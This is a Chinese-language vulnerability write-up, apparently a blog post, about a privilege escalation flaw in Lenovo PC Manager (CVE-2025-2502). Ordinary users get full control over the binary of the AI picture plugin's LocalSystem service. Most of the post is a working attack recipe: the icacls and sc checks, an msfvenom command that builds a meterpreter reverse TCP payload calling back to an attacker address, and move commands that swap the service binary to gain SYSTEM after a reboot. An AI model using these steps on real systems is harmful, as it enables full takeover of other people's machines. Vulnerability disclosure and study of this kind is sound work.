CVE-2025-2502 / CNVD-2025-16450 联想电脑管家权限提升漏洞

在联想电脑管家的任意版本中,联想电脑管家的工具都存在权限缺陷,只要是下载的工具,普通用户拥有 F 权限(完全权限)

由于所有版本的工具都存在权限问题,普通用户可以进如 admin 权限,这边使用 ai 看图插件演示,因为其有 system 权限服务,可以提升至 system,在 5.1.100.1102 之前,联想电脑管家存在插件 AI 看图

在安装 AI 看图插件后,其存在一个可持续服务

plain 复制代码
C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe

使用 icacls 查看其文件权限

发现普通 Users 权限为 I F,完全权限,创建一个普通用户

切入攻击视角,在 Administors 用户组未登入的情况下,需要注销所有用户,我们再进入 user1 用户,使用 sc 查看服务,其用户为 LocalSystem

plain 复制代码
sc qc KPICService_Lenovo

其中 C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe 就是普通用户拥有完全控制的文件

但是因为限制,该服务会一直占用,普通用户需要 admin 才能进行关闭

尝试更换思路:因为普通用户有完全控制权限,普通用户将文件进行移动,重启时,服务读取配置路径,还是会以 LocalSystem 运行 kpicservice.exe

现在开始实践,先生成一个 kpicservice.exe

plain 复制代码
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.133 LPORT=4444 -f exe -o kpicservice.exe

同时将原文件路径进行移动 ,并将 shell 替换原文件的 kpicservice.exe

plain 复制代码
move C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe kpicservice.exe
move Desktop\kpicservice.exe C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe

此时再重启设备,服务会启动路径中即被替换的 kpicservice ,获得 system 权限

相关推荐
白帽子凯哥哥4 天前
2026零基础如何参与护网行动?(非常详细)
数据库·sql·学习·漏洞·xss
白帽子凯哥哥9 天前
在学习SQL注入或XSS这类具体漏洞时,如何设计一个高效的“理论+实践”学习循环?
sql·学习·漏洞·xss
独角鲸网络安全实验室13 天前
高危预警!React核心组件曝CVSS 9.8漏洞,数百万开发者面临远程代码执行风险
运维·前端·react.js·网络安全·企业安全·漏洞·cve-2025-11953
独角鲸网络安全实验室13 天前
高危预警!React CVE-2025-55182 突破 RSC 防护,未授权 RCE 威胁 39% 云应用
前端·react.js·网络安全·前端框架·漏洞·rce·cve-2025-55182
网络研究院19 天前
监管要求不统一暴露了移动安全方面的漏洞
网络·安全·漏洞·风险·监管
至善迎风25 天前
React2Shell(CVE-2025-55182)漏洞服务器排查完整指南
网络安全·react·数据安全·漏洞·next·rsc·cve-2025-55182
奔跑吧邓邓子3 个月前
【C++实战(75)】筑牢安全防线,攻克漏洞难题
c++·安全·实战·漏洞
黑客思维者3 个月前
Notepad++中高危DLL劫持漏洞深度剖析
notepad++·漏洞·dll劫持
网络研究院4 个月前
Citrix 零日漏洞自五月起遭积极利用
网络·安全·漏洞·威胁